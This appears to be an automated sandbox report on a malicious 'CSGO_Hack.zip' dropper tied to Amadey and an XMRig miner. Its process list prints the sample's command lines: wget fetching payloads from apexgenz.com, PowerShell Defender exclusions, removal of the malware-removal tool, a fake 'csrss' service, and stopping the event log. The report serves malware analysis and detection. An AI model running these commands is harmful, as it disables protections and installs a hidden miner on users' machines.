Analysis Overview
SHA256
37ffba131c763e2630433b2865a8149508af32f387fb5808cfaf539815bb5077
Threat Level: Known bad
The file CSGO_Hack.zip was found to be: Known bad.
Malicious Activity Summary
xmrig
Amadey
XMRig Miner payload
Stops running service(s)
Creates new service(s)
Drops file in Drivers directory
Checks BIOS information in registry
Uses the VBS compiler for execution
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Checks computer location settings
Drops file in System32 directory
Executes dropped EXE
Modifies system executable filetype association
Drops file in Windows directory
Loads dropped DLL
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Program crash
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Modifies data under HKEY_USERS
Modifies registry class
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-29 02:16
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral4
Detonation Overview
Submitted
2024-02-29 02:14
Reported
2024-02-29 02:52
Platform
win10v2004-20240226-en
Max time kernel
1799s
Max time network
1754s
Command Line
Signatures
Amadey
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\system32\conhost.exe | N/A |
Uses the VBS compiler for execution
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4400 set thread context of 4060 | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | C:\Users\Admin\AppData\Roaming\services\plugin0228 |
| PID 3692 set thread context of 1372 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 3692 set thread context of 4912 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 3732 set thread context of 3088 | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0228 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0228 | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\services\plugin0228 |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\conhost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0228
C:\Users\Admin\AppData\Roaming\services\plugin0228
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0228
"C:\Users\Admin\AppData\Roaming\services\plugin0228"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4060 -ip 4060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 592
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "csrss"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "csrss" binpath= "C:\ProgramData\SystemFiles\csrss.exe" start= "auto"
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\services\2plugin2901"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "csrss"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\SystemFiles\csrss.exe
C:\ProgramData\SystemFiles\csrss.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
conhost.exe
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Users\Admin\AppData\Roaming\services\3plugin0228
C:\Users\Admin\AppData\Roaming\services\3plugin0228
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3088 -ip 3088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3088 -s 212
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | solvadordali.com | udp |
| US | 8.8.8.8:53 | 199.29.14.185.in-addr.arpa | udp |
| NL | 185.14.29.199:80 | solvadordali.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| NL | 194.87.31.18:3333 | N/A | tcp |
| US | 8.8.8.8:53 | 18.31.87.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
| MD5 | e5c00b0bc45281666afd14eef04252b2 |
| SHA1 | 3b6eecf8250e88169976a5f866d15c60ee66b758 |
| SHA256 | 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903 |
| SHA512 | 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll
| MD5 | 7de0541eb96ba31067b4c58d9399693b |
| SHA1 | a105216391bd53fa0c8f6aa23953030d0c0f9244 |
| SHA256 | 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e |
| SHA512 | e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest
| MD5 | f0fc065f7fd974b42093594a58a4baef |
| SHA1 | dbf28dd15d4aa338014c9e508a880e893c548d00 |
| SHA256 | d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693 |
| SHA512 | 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe |
memory/1132-20-0x0000000002790000-0x00000000027C6000-memory.dmp
memory/1132-21-0x0000000073B10000-0x00000000742C0000-memory.dmp
memory/1132-23-0x0000000005300000-0x0000000005928000-memory.dmp
memory/1132-24-0x0000000000E10000-0x0000000000E20000-memory.dmp
